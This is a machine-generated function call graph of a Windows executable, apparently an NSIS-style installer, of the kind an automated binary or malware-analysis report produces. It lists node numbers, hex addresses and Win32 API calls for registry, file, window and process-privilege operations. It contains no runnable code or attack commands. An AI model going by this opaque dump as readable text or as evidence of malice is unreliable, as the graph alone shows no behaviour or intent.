2972->2964 2974 404aea 2972->2974 2978 404a6b SendMessageA 2972->2978 2979 404aa7 SendMessageA 2972->2979 2980 404ab8 SendMessageA 2972->2980 2973->2945 2974->2964 2974->2967 2975 404d79 2984 404e3f InvalidateRect 2975->2984 2988 404ded SendMessageA SendMessageA 2975->2988 2978->2972 2979->2972 2980->2972 2982 404b22 2982->2952 2983->2975 2985 404d63 SendMessageA 2983->2985 2984->2961 2986 404e55 2984->2986 2985->2975 3005 4047ce 2986->3005 2988->2975 2989->2982 2990->2949 2992 404872 SendMessageA 2991->2992 2993 404836 GetMessagePos ScreenToClient SendMessageA 2991->2993 2994 40486a 2992->2994 2993->2994 2995 40486f 2993->2995 2994->2971 2995->2992 3008 405d2f lstrcpynA 2996->3008 2998 4048a6 3009 405c8d wsprintfA 2998->3009 3000 4048b0 3001 40140b 2 API calls 3000->3001 3002 4048b9 3001->3002 3010 405d2f lstrcpynA 3002->3010 3004 4048c0 3004->2983 3011 404709 3005->3011 3007 4047e3 3007->2961 3008->2998 3009->3000 3010->3004 3012 40471f 3011->3012 3013 405d51 18 API calls 3012->3013 3014 404783 3013->3014 3015 405d51 18 API calls 3014->3015 3016 40478e 3015->3016 3017 405d51 18 API calls 3016->3017 3018 4047a4 lstrlenA wsprintfA SetDlgItemTextA 3017->3018 3018->3007 3590 4026c6 3591 402a3a 18 API calls 3590->3591 3592 4026d4 3591->3592 3593 4026ea 3592->3593 3594 402a3a 18 API calls 3592->3594 3595 40597d 2 API calls 3593->3595 3594->3593 3596 4026f0 3595->3596 3618 4059a2 GetFileAttributesA CreateFileA 3596->3618 3598 4026fd 3599 4027a0 3598->3599 3600 402709 GlobalAlloc 3598->3600 3603 4027a8 DeleteFileA 3599->3603 3604 4027bb 3599->3604 3601 402722 3600->3601 3602 402797 CloseHandle 3600->3602 3619 4030c7 SetFilePointer 3601->3619 3602->3599 3603->3604 3606 402728 3607 4030b1 ReadFile 3606->3607 3608 402731 GlobalAlloc 3607->3608 3609 402741 3608->3609 3610 402775 3608->3610 3612 402e9f 32 API calls 3609->3612 3611 405a49 WriteFile 3610->3611 3613 402781 GlobalFree 3611->3613 3617 40274e 3612->3617 3614 402e9f 32 API calls 3613->3614 3615 402794 3614->3615 3615->3602 3616 40276c GlobalFree 3616->3610 3617->3616 3618->3598 3619->3606 3620 402847 3621 402a1d 18 API calls 3620->3621 3622 40284d 3621->3622 3623 40287e 3622->3623 3624 4026a6 3622->3624 3625 40285b 3622->3625 3623->3624 3626 405d51 18 API calls 3623->3626 3625->3624 3628 405c8d wsprintfA 3625->3628 3626->3624 3628->3624 3629 4022c7 3630 402a3a 18 API calls 3629->3630 3631 4022d8 3630->3631 3632 402a3a 18 API calls 3631->3632 3633 4022e1 3632->3633 3634 402a3a 18 API calls 3633->3634 3635 4022eb GetPrivateProfileStringA 3634->3635 3055 401bca 3056 402a1d 18 API calls 3055->3056 3057 401bd1 3056->3057 3058 402a1d 18 API calls 3057->3058 3059 401bdb 3058->3059 3060 401beb 3059->3060 3062 402a3a 18 API calls 3059->3062 3061 401bfb 3060->3061 3063 402a3a 18 API calls 3060->3063 3064 401c06 3061->3064 3065 401c4a 3061->3065 3062->3060 3063->3061 3066 402a1d 18 API calls 3064->3066 3067 402a3a 18 API calls 3065->3067 3068 401c0b 3066->3068 3069 401c4f 3067->3069 3071 402a1d 18 API calls 3068->3071 3070 402a3a 18 API calls 3069->3070 3072 401c58 FindWindowExA 3070->3072 3073 401c14 3071->3073 3076 401c76 3072->3076 3074 401c3a SendMessageA 3073->3074 3075 401c1c SendMessageTimeoutA 3073->3075 3074->3076 3075->3076 3492 401751 3493 402a3a 18 API calls 3492->3493 3494 401758 3493->3494 3495 401776 3494->3495 3496 40177e 3494->3496 3531 405d2f lstrcpynA 3495->3531 3532 405d2f lstrcpynA 3496->3532 3499 40177c 3503 405f9a 5 API calls 3499->3503 3500 401789 3501 4057a1 3 API calls 3500->3501 3502 40178f lstrcatA 3501->3502 3502->3499 3516 40179b 3503->3516 3504 406033 2 API calls 3504->3516 3505 40597d 2 API calls 3505->3516 3507 4017b2 CompareFileTime 3507->3516 3508 401876 3509 404f48 25 API calls 3508->3509 3511 401880 3509->3511 3510 404f48 25 API calls 3512 401862 3510->3512 3513 402e9f 32 API calls 3511->3513 3515 401893 3513->3515 3514 405d2f lstrcpynA 3514->3516 3517 4018a7 SetFileTime 3515->3517 3519 4018b9 CloseHandle 3515->3519 3516->3504 3516->3505 3516->3507 3516->3508 3516->3514 3518 405d51 18 API calls 3516->3518 3527 405525 MessageBoxIndirectA 3516->3527 3529 40184d 3516->3529 3530 4059a2 GetFileAttributesA CreateFileA 3516->3530 3517->3519 3518->3516 3519->3512 3520 4018ca 3519->3520 3521 4018e2 3520->3521 3522 4018cf 3520->3522 3523 405d51 18 API calls 3521->3523 3524 405d51 18 API calls 3522->3524 3526 4018ea 3523->3526 3525 4018d7 lstrcatA 3524->3525 3525->3526 3528 405525 MessageBoxIndirectA 3526->3528 3527->3516 3528->3512 3529->3510 3529->3512 3530->3516 3531->3499 3532->3500 3639 401651 3640 402a3a 18 API calls 3639->3640 3641 401657 3640->3641 3642 406033 2 API calls 3641->3642 3643 40165d 3642->3643 3644 401951 3645 402a1d 18 API calls 3644->3645 3646 401958 3645->3646 3647 402a1d 18 API calls 3646->3647 3648 401962 3647->3648 3649 402a3a 18 API calls 3648->3649 3650 40196b 3649->3650 3651 40197e lstrlenA 3650->3651 3656 4019b9 3650->3656 3652 401988 3651->3652 3652->3656 3657 405d2f lstrcpynA 3652->3657 3654 4019a2 3655 4019af lstrlenA 3654->3655 3654->3656 3655->3656 3657->3654 3658 404352 3659 40437e 3658->3659 3660 40438f 3658->3660 3719 405509 GetDlgItemTextA 3659->3719 3662 40439b GetDlgItem 3660->3662 3695 4043fa 3660->3695 3664 4043af 3662->3664 3663 404389 3665 405f9a 5 API calls 3663->3665 3667 4043c3 SetWindowTextA 3664->3667 3673 40583a 4 API calls 3664->3673 3665->3660 3671 403f14 19 API calls 3667->3671 3668 404688 3672 403f7b 8 API calls 3668->3672 3669 405d51 18 API calls 3674 40446e SHBrowseForFolderA 3669->3674 3670 40450e 3675 40588f 18 API calls 3670->3675 3676 4043df 3671->3676 3677 40469c 3672->3677 3678 4043b9 3673->3678 3679 404486 CoTaskMemFree 3674->3679 3680 4044de 3674->3680 3681 404514 3675->3681 3682 403f14 19 API calls 3676->3682 3678->3667 3685 4057a1 3 API calls 3678->3685 3683 4057a1 3 API calls 3679->3683 3680->3668 3721 405509 GetDlgItemTextA 3680->3721 3722 405d2f lstrcpynA 3681->3722 3684 4043ed 3682->3684 3686 404493 3683->3686 3720 403f49 SendMessageA 3684->3720 3685->3667 3689 4044ca SetDlgItemTextA 3686->3689 3694 405d51 18 API calls 3686->3694 3689->3680 3690 4043f3 3692 4060c8 5 API calls 3690->3692 3691 40452b 3693 4060c8 5 API calls 3691->3693 3692->3695 3702 404532 3693->3702 3696 4044b2 lstrcmpiA 3694->3696 3695->3668 3695->3669 3695->3680 3696->3689 3699 4044c3 lstrcatA 3696->3699 3697 40456e 3723 405d2f lstrcpynA 3697->3723 3699->3689 3700 404575 3701 40583a 4 API calls 3700->3701 3703 40457b GetDiskFreeSpaceA 3701->3703 3702->3697 3705 4057e8 2 API calls 3702->3705 3707 4045c6 3702->3707 3706 40459f MulDiv 3703->3706 3703->3707 3705->3702 3706->3707 3708 404637 3707->3708 3709 4047ce 21 API calls 3707->3709 3710 40465a 3708->3710 3712 40140b 2 API calls 3708->3712 3711 404624 3709->3711 3724 403f36 EnableWindow 3710->3724 3714 404639 SetDlgItemTextA 3711->3714 3715 404629 3711->3715 3712->3710 3714->3708 3717 404709 21 API calls 3715->3717 3716 404676 3716->3668 3725 4042e7 3716->3725 3717->3708 3719->3663 3720->3690 3721->3670 3722->3691 3723->3700 3724->3716 3726 4042f5 3725->3726 3727 4042fa SendMessageA 3725->3727 3726->3727 3727->3668 3728 4019d2 3729 402a3a 18 API calls 3728->3729 3730 4019d9 3729->3730 3731 402a3a 18 API calls 3730->3731 3732 4019e2 3731->3732 3733 4019e9 lstrcmpiA 3732->3733 3734 4019fb lstrcmpA 3732->3734 3735 4019ef 3733->3735 3734->3735 3736 4021d2 3737 402a3a 18 API calls 3736->3737 3738 4021d8 3737->3738 3739 402a3a 18 API calls 3738->3739 3740 4021e1 3739->3740 3741 402a3a 18 API calls 3740->3741 3742 4021ea 3741->3742 3743 406033 2 API calls 3742->3743 3744 4021f3 3743->3744 3745 402204 lstrlenA lstrlenA 3744->3745 3746 4021f7 3744->3746 3748 404f48 25 API calls 3745->3748 3747 404f48 25 API calls 3746->3747 3750 4021ff 3746->3750 3747->3750 3749 402240 SHFileOperationA 3748->3749 3749->3746 3749->3750 3751 4014d6 3752 402a1d 18 API calls 3751->3752 3753 4014dc Sleep 3752->3753 3755 4028cf 3753->3755 3756 40155b 3757 401577 ShowWindow 3756->3757 3758 40157e 3756->3758 3757->3758 3759 40158c ShowWindow 3758->3759 3760 4028cf 3758->3760 3759->3760 3761 40255c 3762 402a1d 18 API calls 3761->3762 3764 402566 3762->3764 3763 4025d0 3764->3763 3765 405a1a ReadFile 3764->3765 3766 4025d2 3764->3766 3769 4025e2 3764->3769 3765->3764 3770 405c8d wsprintfA 3766->3770 3768 4025f8 SetFilePointer 3768->3763 3769->3763 3769->3768 3770->3763 3771 40405d 3772 404073 3771->3772 3779 40417f 3771->3779 3776 403f14 19 API calls 3772->3776 3773 4041ee 3774 4042c2 3773->3774 3775 4041f8 GetDlgItem 3773->3775 3781 403f7b 8 API calls 3774->3781 3777 404280 3775->3777 3778 40420e 3775->3778 3780 4040c9 3776->3780 3777->3774 3786 404292 3777->3786 3778->3777 3785 404234 6 API calls 3778->3785 3779->3773 3779->3774 3783 4041c3 GetDlgItem SendMessageA 3779->3783 3782 403f14 19 API calls 3780->3782 3793 4042bd 3781->3793 3784 4040d6 CheckDlgButton 3782->3784 3802 403f36 EnableWindow 3783->3802 3800 403f36 EnableWindow 3784->3800 3785->3777 3789 404298 SendMessageA 3786->3789 3790 4042a9 3786->3790 3789->3790 3790->3793 3794 4042af SendMessageA 3790->3794 3791 4041e9 3795 4042e7 SendMessageA 3791->3795 3792 4040f4 GetDlgItem 3801 403f49 SendMessageA 3792->3801 3794->3793 3795->3773 3797 40410a SendMessageA 3798 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3797->3798 3799 404128 GetSysColor 3797->3799 3798->3793 3799->3798 3800->3792 3801->3797 3802->3791 3803 40205e 3804 402a3a 18 API calls 3803->3804 3805 402065 3804->3805 3806 402a3a 18 API calls 3805->3806 3807 40206f 3806->3807 3808 402a3a 18 API calls 3807->3808 3809 402079 3808->3809 3810 402a3a 18 API calls 3809->3810 3811 402083 3810->3811 3812 402a3a 18 API calls 3811->3812 3813 40208d 3812->3813 3814 4020cc CoCreateInstance 3813->3814 3815 402a3a 18 API calls 3813->3815 3818 4020eb 3814->3818 3820 402193 3814->3820 3815->3814 3816 401423 25 API calls 3817 4021c9 3816->3817 3819 402173 MultiByteToWideChar 3818->3819 3818->3820 3819->3820 3820->3816 3820->3817 3821 40265e 3822 402664 3821->3822 3823 402668 FindNextFileA 3822->3823 3824 40267a 3822->3824 3823->3824 3825 4026b9 3823->3825 3827 405d2f lstrcpynA 3825->3827 3827->3824 3828 401cde GetDlgItem GetClientRect 3829 402a3a 18 API calls 3828->3829 3830 401d0e LoadImageA SendMessageA 3829->3830 3831 401d2c DeleteObject 3830->3831 3832 4028cf 3830->3832 3831->3832 3833 401662 3834 402a3a 18 API calls 3833->3834 3835 401669 3834->3835 3836 402a3a 18 API calls 3835->3836 3837 401672 3836->3837 3838 402a3a 18 API calls 3837->3838 3839 40167b MoveFileA 3838->3839 3840 401687 3839->3840 3841 40168e 3839->3841 3842 401423 25 API calls 3840->3842 3843 406033 2 API calls 3841->3843 3845 4021c9 3841->3845 3842->3845 3844 40169d 3843->3844 3844->3845 3846 405bea 38 API calls 3844->3846 3846->3840 2887 402364 2888 40236a 2887->2888 2889 402a3a 18 API calls 2888->2889 2890 40237c 2889->2890 2891 402a3a 18 API calls 2890->2891 2892 402386 RegCreateKeyExA 2891->2892 2893 4023b0 2892->2893 2894 4028cf 2892->2894 2895 4023c8 2893->2895 2896 402a3a 18 API calls 2893->2896 2897 4023d4 2895->2897 2904 402a1d 2895->2904 2899 4023c1 lstrlenA 2896->2899 2898 4023ef RegSetValueExA 2897->2898 2907 402e9f 2897->2907 2902 402405 RegCloseKey 2898->2902 2899->2895 2902->2894 2905 405d51 18 API calls 2904->2905 2906 402a31 2905->2906 2906->2897 2908 402eb5 2907->2908 2909 402ee3 2908->2909 2932 4030c7 SetFilePointer 2908->2932 2927 4030b1 2909->2927 2913 402f00 GetTickCount 2916 403034 2913->2916 2923 402f4f 2913->2923 2914 40304a 2915 40308c 2914->2915 2920 40304e 2914->2920 2918 4030b1 ReadFile 2915->2918 2916->2898 2917 4030b1 ReadFile 2917->2923 2918->2916 2919 4030b1 ReadFile 2919->2920 2920->2916 2920->2919 2921 405a49 WriteFile 2920->2921 2921->2920 2922 402fa5 GetTickCount 2922->2923 2923->2916 2923->2917 2923->2922 2924 402fca MulDiv wsprintfA 2923->2924 2930 405a49 WriteFile 2923->2930 2925 404f48 25 API calls 2924->2925 2925->2923 2933 405a1a ReadFile 2927->2933 2931 405a67 2930->2931 2931->2923 2932->2909 2934 402eee 2933->2934 2934->2913 2934->2914 2934->2916 3847 401dea 3848 402a3a 18 API calls 3847->3848 3849 401df0 3848->3849 3850 402a3a 18 API calls 3849->3850 3851 401df9 3850->3851 3852 402a3a 18 API calls 3851->3852 3853 401e02 3852->3853 3854 402a3a 18 API calls 3853->3854 3855 401e0b 3854->3855 3856 401423 25 API calls 3855->3856 3857 401e12 ShellExecuteA 3856->3857 3858 401e3f 3857->3858 3859 40366d 3860 403678 3859->3860 3861 40367c 3860->3861 3862 40367f GlobalAlloc 3860->3862 3862->3861 3863 401eee 3864 402a3a 18 API calls 3863->3864 3865 401ef5 3864->3865 3866 4060c8 5 API calls 3865->3866 3867 401f04 3866->3867 3868 401f1c GlobalAlloc 3867->3868 3869 401f84 3867->3869 3868->3869 3870 401f30 3868->3870 3871 4060c8 5 API calls 3870->3871 3872 401f37 3871->3872 3873 4060c8 5 API calls 3872->3873 3874 401f41 3873->3874 3874->3869 3878 405c8d wsprintfA 3874->3878 3876 401f78 3879 405c8d wsprintfA 3876->3879 3878->3876 3879->3869 3880 4014f0 SetForegroundWindow 3881 4028cf 3880->3881 3887 4018f5 3888 40192c 3887->3888 3889 402a3a 18 API calls 3888->3889 3890 401931 3889->3890 3891 4055d1 69 API calls 3890->3891 3892 40193a 3891->3892 3893 4024f7 3894 402a3a 18 API calls 3893->3894 3895 4024fe 3894->3895 3898 4059a2 GetFileAttributesA CreateFileA 3895->3898 3897 40250a 3898->3897 3899 4018f8 3900 402a3a 18 API calls 3899->3900 3901 4018ff 3900->3901 3902 405525 MessageBoxIndirectA 3901->3902 3903 401908 3902->3903 3904 4014fe 3905 401506 3904->3905 3907 401519 3904->3907 3906 402a1d 18 API calls 3905->3906 3906->3907 3908 402b7f 3909 402ba7 3908->3909 3910 402b8e SetTimer 3908->3910 3911 402bfc 3909->3911 3912 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3909->3912 3910->3909 3912->3911 3913 401000 3914 401037 BeginPaint GetClientRect 3913->3914 3915 40100c DefWindowProcA 3913->3915 3917 4010f3 3914->3917 3920 401179 3915->3920 3918 401073 CreateBrushIndirect FillRect DeleteObject 3917->3918 3919 4010fc 3917->3919 3918->3917 3921 401102 CreateFontIndirectA 3919->3921 3922 401167 EndPaint 3919->3922 3921->3922 3923 401112 6 API calls 3921->3923 3922->3920 3923->3922 3924 401b02 3925 402a3a 18 API calls 3924->3925 3926 401b09 3925->3926 3927 402a1d 18 API calls 3926->3927 3928 401b12 wsprintfA 3927->3928 3929 4028cf 3928->3929 3930 402482 3931 402b44 19 API calls 3930->3931 3932 40248c 3931->3932 3933 402a1d 18 API calls 3932->3933 3934 402495 3933->3934 3935 4024b8 RegEnumValueA 3934->3935 3936 4024ac RegEnumKeyA 3934->3936 3937 4026a6 3934->3937 3935->3937 3938 4024d1 RegCloseKey 3935->3938 3936->3938 3938->3937 2840 401a03 2846 402a3a 2840->2846 2843 401a20 2844 401a25 lstrcmpA 2843->2844 2845 401a33 2843->2845 2844->2845 2847 402a46 2846->2847 2848 405d51 18 API calls 2847->2848 2849 402a67 2848->2849 2850 401a0c ExpandEnvironmentStringsA 2849->2850 2851 405f9a 5 API calls 2849->2851 2850->2843 2850->2845 2851->2850 3940 402283 3941 402291 3940->3941 3942 40228b 3940->3942 3944 402a3a 18 API calls 3941->3944 3946 4022a1 3941->3946 3943 402a3a 18 API calls 3942->3943 3943->3941 3944->3946 3945 4022af 3948 402a3a 18 API calls 3945->3948 3946->3945 3947 402a3a 18 API calls 3946->3947 3947->3945 3949 4022b8 WritePrivateProfileStringA 3948->3949 3950 405086 3951 405231 3950->3951 3952 4050a8 GetDlgItem GetDlgItem GetDlgItem 3950->3952 3954 405261 3951->3954 3955 405239 GetDlgItem CreateThread CloseHandle 3951->3955 3995 403f49 SendMessageA 3952->3995 3956 40528f 3954->3956 3959 4052b0 3954->3959 3960 405277 ShowWindow ShowWindow 3954->3960 3955->3954 3957 4052ea 3956->3957 3961 4052c3 ShowWindow 3956->3961 3962 40529f 3956->3962 3957->3959 3972 4052f7 SendMessageA 3957->3972 3958 405118 3964 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3958->3964 3963 403f7b 8 API calls 3959->3963 3997 403f49 SendMessageA 3960->3997 3968 4052e3 3961->3968 3969 4052d5 3961->3969 3966 403eed SendMessageA 3962->3966 3967 4052bc 3963->3967 3970 405171 SendMessageA SendMessageA 3964->3970 3971 40518d 3964->3971 3966->3959 3974 403eed SendMessageA 3968->3974 3973 404f48 25 API calls 3969->3973 3970->3971 3975 4051a0 3971->3975 3976 405192 SendMessageA 3971->3976 3972->3967 3977 405310 CreatePopupMenu 3972->3977 3973->3968 3974->3957 3978 403f14 19 API calls 3975->3978 3976->3975 3979 405d51 18 API calls 3977->3979 3981 4051b0 3978->3981 3980 405320 AppendMenuA 3979->3980 3982 405351 TrackPopupMenu 3980->3982 3983 40533e GetWindowRect 3980->3983 3984 4051b9 ShowWindow 3981->3984 3985 4051ed GetDlgItem SendMessageA 3981->3985 3982->3967 3986 40536d 3982->3986 3983->3982 3987 4051dc 3984->3987 3988 4051cf ShowWindow 3984->3988 3985->3967 3989 405214 SendMessageA SendMessageA 3985->3989 3990 40538c SendMessageA 3986->3990 3996 403f49 SendMessageA 3987->3996 3988->3987 3989->3967 3990->3990 3991 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3990->3991 3993 4053cb SendMessageA 3991->3993 3993->3993 3994 4053ed GlobalUnlock SetClipboardData CloseClipboard 3993->3994 3994->3967 3995->3958 3996->3985 3997->3956 3019 402308 3020 402338 3019->3020 3021 40230d 3019->3021 3023 402a3a 18 API calls 3020->3023 3032 402b44 3021->3032 3025 40233f 3023->3025 3024 402314 3026 40231e 3024->3026 3030 402357 3024->3030 3036 402a7a RegOpenKeyExA 3025->3036 3027 402a3a 18 API calls 3026->3027 3028 402325 RegDeleteValueA RegCloseKey 3027->3028 3028->3030 3033 402a3a 18 API calls 3032->3033 3034 402b5d 3033->3034 3035 402b6b RegOpenKeyExA 3034->3035 3035->3024 3040 402aa5 3036->3040 3044 402355 3036->3044 3037 402acb RegEnumKeyA 3038 402add RegCloseKey 3037->3038 3037->3040 3046 4060c8 GetModuleHandleA 3038->3046 3039 402b02 RegCloseKey 3039->3044 3040->3037 3040->3038 3040->3039 3042 402a7a 5 API calls 3040->3042 3042->3040 3044->3030 3045 402b1d RegDeleteKeyA 3045->3044 3047 4060e4 3046->3047 3048 4060ee GetProcAddress 3046->3048 3052 40605a GetSystemDirectoryA 3047->3052 3050 402aed 3048->3050 3050->3044 3050->3045 3051 4060ea 3051->3048 3051->3050 3053 40607c wsprintfA LoadLibraryExA 3052->3053 3053->3051 3998 402688 3999 402a3a 18 API calls 3998->3999 4000 40268f FindFirstFileA 3999->4000 4001 4026b2 4000->4001 4005 4026a2 4000->4005 4002 4026b9 4001->4002 4006 405c8d wsprintfA 4001->4006 4007 405d2f lstrcpynA 4002->4007 4006->4002 4007->4005 4008 401c8a 4009 402a1d 18 API calls 4008->4009 4010 401c90 IsWindow 4009->4010 4011 4019f3 4010->4011 4012 40430b 4013 404341 4012->4013 4014 40431b 4012->4014 4016 403f7b 8 API calls 4013->4016 4015 403f14 19 API calls 4014->4015 4017 404328 SetDlgItemTextA 4015->4017 4018 40434d 4016->4018 4017->4013 3205 40310f SetErrorMode GetVersion 3206 403146 3205->3206 3207 40314c 3205->3207 3208 4060c8 5 API calls 3206->3208 3209 40605a 3 API calls 3207->3209 3208->3207 3210 403162 lstrlenA 3209->3210 3210->3207 3211 403171 3210->3211 3212 4060c8 5 API calls 3211->3212 3213 403179 3212->3213 3214 4060c8 5 API calls 3213->3214 3215 403180 #17 OleInitialize SHGetFileInfoA 3214->3215 3293 405d2f lstrcpynA 3215->3293 3217 4031bd GetCommandLineA 3294 405d2f lstrcpynA 3217->3294 3219 4031cf GetModuleHandleA 3220 4031e6 3219->3220 3221 4057cc CharNextA 3220->3221 3222 4031fa CharNextA 3221->3222 3231 40320a 3222->3231 3223 4032d4 3224 4032e7 GetTempPathA 3223->3224 3295 4030de 3224->3295 3226 4032ff 3228 403303 GetWindowsDirectoryA lstrcatA 3226->3228 3229 403359 DeleteFileA 3226->3229 3227 4057cc CharNextA 3227->3231 3232 4030de 12 API calls 3228->3232 3305 402c66 GetTickCount GetModuleFileNameA 3229->3305 3231->3223 3231->3227 3233 4032d6 3231->3233 3235 40331f 3232->3235 3389 405d2f lstrcpynA 3233->3389 3234 40336d 3242 4057cc CharNextA 3234->3242 3275 4033f3 3234->3275 3288 403403 3234->3288 3235->3229 3237 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3235->3237 3239 4030de 12 API calls 3237->3239 3240 403351 3239->3240 3240->3229 3240->3288 3246 403388 3242->3246 3244 40353b 3248 403543 GetCurrentProcess OpenProcessToken 3244->3248 3249 4035bd ExitProcess 3244->3249 3245 40341d 3399 405525 3245->3399 3253 403433 3246->3253 3254 4033ce 3246->3254 3250 40358e 3248->3250 3251 40355e LookupPrivilegeValueA AdjustTokenPrivileges 3248->3251 3256 4060c8 5 API calls 3250->3256 3251->3250 3403 4054a8 3253->3403 3257 40588f 18 API calls 3254->3257 3259 403595 3256->3259 3260 4033d9 3257->3260 3264 4035aa ExitWindowsEx 3259->3264 3267 4035b6 3259->3267 3260->3288 3390 405d2f lstrcpynA 3260->3390 3262 403454 lstrcatA lstrcmpiA 3266 403470 3262->3266 3262->3288 3263 403449 lstrcatA 3263->3262 3264->3249 3264->3267 3269 403475 3266->3269 3270 40347c 3266->3270 3271 40140b 2 API calls 3267->3271 3268 4033e8 3391 405d2f lstrcpynA 3268->3391 3406 40540e CreateDirectoryA 3269->3406 3411 40548b CreateDirectoryA 3270->3411 3271->3249 3333 4036af 3275->3333 3277 403481 SetCurrentDirectoryA 3278 403490 3277->3278 3279 40349b 3277->3279 3414 405d2f lstrcpynA 3278->3414 3415 405d2f lstrcpynA 3279->3415 3282 405d51 18 API calls 3283 4034da DeleteFileA 3282->3283 3284 4034e7 CopyFileA 3283->3284 3290 4034a9 3283->3290 3284->3290 3285 40352f 3287 405bea 38 API calls 3285->3287 3286 405bea 38 API calls 3286->3290 3287->3288 3392 4035d5 3288->3392 3289 405d51 18 API calls 3289->3290 3290->3282 3290->3285 3290->3286 3290->3289 3291 4054c0 2 API calls 3290->3291 3292 40351b CloseHandle 3290->3292 3291->3290 3292->3290 3293->3217 3294->3219 3296 405f9a 5 API calls 3295->3296 3297 4030ea 3296->3297 3298 4030f4 3297->3298 3299 4057a1 3 API calls 3297->3299 3298->3226 3300 4030fc 3299->3300 3301 40548b 2 API calls 3300->3301 3302 403102 3301->3302 3416 4059d1 3302->3416 3420 4059a2 GetFileAttributesA CreateFileA 3305->3420 3307 402ca6 3325 402cb6 3307->3325 3421 405d2f lstrcpynA 3307->3421 3309 402ccc 3310 4057e8 2 API calls 3309->3310 3311 402cd2 3310->3311 3422 405d2f lstrcpynA 3311->3422 3313 402cdd GetFileSize 3314 402dd9 3313->3314 3327 402cf4 3313->3327 3423 402c02 3314->3423 3316 402de2 3318 402e12 GlobalAlloc 3316->3318 3316->3325 3435 4030c7 SetFilePointer 3316->3435 3317 4030b1 ReadFile 3317->3327 3434 4030c7 SetFilePointer 3318->3434 3320 402e45 3324 402c02 6 API calls 3320->3324 3322 402dfb 3326 4030b1 ReadFile 3322->3326 3323 402e2d 3328 402e9f 32 API calls 3323->3328 3324->3325 3325->3234 3329 402e06 3326->3329 3327->3314 3327->3317 3327->3320 3327->3325 3330 402c02 6 API calls 3327->3330 3331 402e39 3328->3331 3329->3318 3329->3325 3330->3327 3331->3325 3331->3331 3332 402e76 SetFilePointer 3331->3332 3332->3325 3334 4060c8 5 API calls 3333->3334 3335 4036c3 3334->3335 3336 4036c9 3335->3336 3337 4036db 3335->3337 3445 405c8d wsprintfA 3336->3445 3338 405c16 3 API calls 3337->3338 3339 403706 3338->3339 3340 403724 lstrcatA 3339->3340 3342 405c16 3 API calls 3339->3342 3343 4036d9 3340->3343 3342->3340 3436 403974 3343->3436 3346 40588f 18 API calls 3347 403756 3346->3347 3348 4037df 3347->3348 3350 405c16 3 API calls 3347->3350 3349 40588f 18 API calls 3348->3349 3351 4037e5 3349->3351 3352 403782 3350->3352 3353 4037f5 LoadImageA 3351->3353 3354 405d51 18 API calls 3351->3354 3352->3348 3360 40379e lstrlenA 3352->3360 3361 4057cc CharNextA 3352->3361 3355 40389b 3353->3355 3356 40381c RegisterClassA 3353->3356 3354->3353 3359 40140b 2 API calls 3355->3359 3357 403852 SystemParametersInfoA CreateWindowExA 3356->3357 3358 4038a5 3356->3358 3357->3355 3358->3288 3364 4038a1 3359->3364 3362 4037d2 3360->3362 3363 4037ac lstrcmpiA 3360->3363 3365 40379c 3361->3365 3367 4057a1 3 API calls 3362->3367 3363->3362 3366 4037bc GetFileAttributesA 3363->3366 3364->3358 3369 403974 19 API calls 3364->3369 3365->3360 3368 4037c8 3366->3368 3370 4037d8 3367->3370 3368->3362 3371 4057e8 2 API calls 3368->3371 3372 4038b2 3369->3372 3446 405d2f lstrcpynA 3370->3446 3371->3362 3374 403941 3372->3374 3375 4038be ShowWindow 3372->3375 3447 40501a OleInitialize 3374->3447 3377 40605a 3 API calls 3375->3377 3379 4038d6 3377->3379 3378 403947 3380 403963 3378->3380 3381 40394b 3378->3381 3382 4038e4 GetClassInfoA 3379->3382 3386 40605a 3 API calls 3379->3386 3385 40140b 2 API calls 3380->3385 3381->3358 3388 40140b 2 API calls 3381->3388 3383 4038f8 GetClassInfoA RegisterClassA 3382->3383 3384 40390e DialogBoxParamA 3382->3384 3383->3384 3387 40140b 2 API calls 3384->3387 3385->3358 3386->3382 3387->3358 3388->3358 3389->3224 3390->3268 3391->3275 3393 4035ed 3392->3393 3394 4035df CloseHandle 3392->3394 3455 40361a 3393->3455 3394->3393 3397 4055d1 69 API calls 3398 40340c OleUninitialize 3397->3398 3398->3244 3398->3245 3400 40553a 3399->3400 3401 40342b ExitProcess 3400->3401 3402 40554e MessageBoxIndirectA 3400->3402 3402->3401 3404 4060c8 5 API calls 3403->3404 3405 403438 lstrcatA 3404->3405 3405->3262 3405->3263 3407 40545f GetLastError 3406->3407 3408 40347a 3406->3408 3407->3408 3409 40546e SetFileSecurityA 3407->3409 3408->3277 3409->3408 3410 405484 GetLastError 3409->3410 3410->3408 3412 40549b 3411->3412 3413 40549f GetLastError 3411->3413 3412->3277 3413->3412 3414->3279 3415->3290 3417 4059dc GetTickCount GetTempFileNameA 3416->3417 3418 40310d 3417->3418 3419 405a09 3417->3419 3418->3226 3419->3417 3419->3418 3420->3307 3421->3309 3422->3313 3424 402c23 3423->3424 3425 402c0b 3423->3425 3428 402c33 GetTickCount 3424->3428 3429 402c2b 3424->3429 3426 402c14 DestroyWindow 3425->3426 3427 402c1b 3425->3427 3426->3427 3427->3316 3431 402c41 CreateDialogParamA ShowWindow 3428->3431 3432 402c64 3428->3432 3430 406104 2 API calls 3429->3430 3433 402c31 3430->3433 3431->3432 3432->3316 3433->3316 3434->3323 3435->3322 3437 403988 3436->3437 3454 405c8d wsprintfA 3437->3454 3439 4039f9 3440 405d51 18 API calls 3439->3440 3441 403a05 SetWindowTextA 3440->3441 3442 403a21 3441->3442 3443 403734 3441->3443 3442->3443 3444 405d51 18 API calls 3442->3444 3443->3346 3444->3442 3445->3343 3446->3348 3448 403f60 SendMessageA 3447->3448 3452 40503d 3448->3452 3449 405064 3450 403f60 SendMessageA 3449->3450 3451 405076 OleUninitialize 3450->3451 3451->3378 3452->3449 3453 401389 2 API calls 3452->3453 3453->3452 3454->3439 3456 403628 3455->3456 3457 40362d FreeLibrary GlobalFree 3456->3457 3458 4035f2 3456->3458 3457->3457 3457->3458 3458->3397 3459 402410 3460 402b44 19 API calls 3459->3460 3461 40241a 3460->3461 3462 402a3a 18 API calls 3461->3462 3463 402423 3462->3463 3464 40242d RegQueryValueExA 3463->3464 3468 4026a6 3463->3468 3465 402453 RegCloseKey 3464->3465 3466 40244d 3464->3466 3465->3468 3466->3465 3470 405c8d wsprintfA 3466->3470 3470->3465 3471 401f90 3472 401fa2 3471->3472 3481 402050 3471->3481 3473 402a3a 